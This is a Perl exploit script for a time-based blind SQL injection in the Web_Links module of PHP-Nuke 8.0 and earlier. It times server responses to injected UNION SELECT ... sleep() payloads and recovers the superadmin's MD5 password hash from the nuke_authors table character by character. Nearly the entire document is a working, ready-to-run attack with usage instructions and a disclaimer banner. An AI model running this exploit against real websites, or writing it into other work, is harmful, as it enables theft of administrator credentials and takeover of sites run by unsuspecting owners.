# PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit # Author: yawn # Contact Me: http://www.unitx.net # E-Mail: yawn@unitx.net # Requirements: magic_quotes_gpc : off # Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90 # He had but little gold within his suitcase; # But all that he might borrow from a friend # On books and learning he would swiftly spend, # -- Geoffrey Chaucer, The Clerk use strict; use warnings; use LWP::UserAgent; sub Nuke::Bench { my $hosto = $_; my $website = LWP::UserAgent->new; my $average = 0; print "[+] Calculating average load time (it may take a while) ...\n"; for (my $i = 0; $i < 5 ; $i++) { my $bef = time(); my $out = $website->get($hosto); my $time = time(); $average += int($time-$bef); } return $average/5; } sub Nuke::Usage() { print "[+] Usage: perl nuke.pl \n"; print "[+] the host must be the complete path to modules.php\n"; print "[+] Example: perl nuke.pl http://www.site.com/modules.php\n"; } sub Nuke::Banner() { print "[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.0\n"; print "[+] I'm not responsable for an illegal use of this exploit\n"; print "[+] Date: 06-02-2010\n"; print "[+] Author: yawn\n"; } Nuke::Banner(); my $host = shift || die Nuke::Usage(); $host .= "?name=Web_Links&l_op=Add&title=WTF&description=WTF"; my $time = Nuke::Bench($host); my $attack = LWP::UserAgent->new; my $pass = ""; $attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9'); my @charset = (48..57, 97..102); print "[+] Average load time is $time\n"; print "[+] Trying to exploit the SQL Injection\n"; for (my $j = 1; $j <=32; $j++) { sleep(3); foreach (@charset) { sleep(2); print "[+] Now trying with $_ \n"; my $before = time(); my $resp = $attack->post($host, { url => "'/**/UNION SELECT IF(SUBSTRING(pwd,$j,1)=CHAR($_),sleep(6),null) FROM nuke_authors WHERE radminsuper='1" }, Referer => $host); my $after = time(); if(int($after-$before) > ($time + 4)) { print "[+] Success with ".chr($_)."\n"; $pass .= chr($_); last; } } } print "[+] MD5 Hash : $pass\n";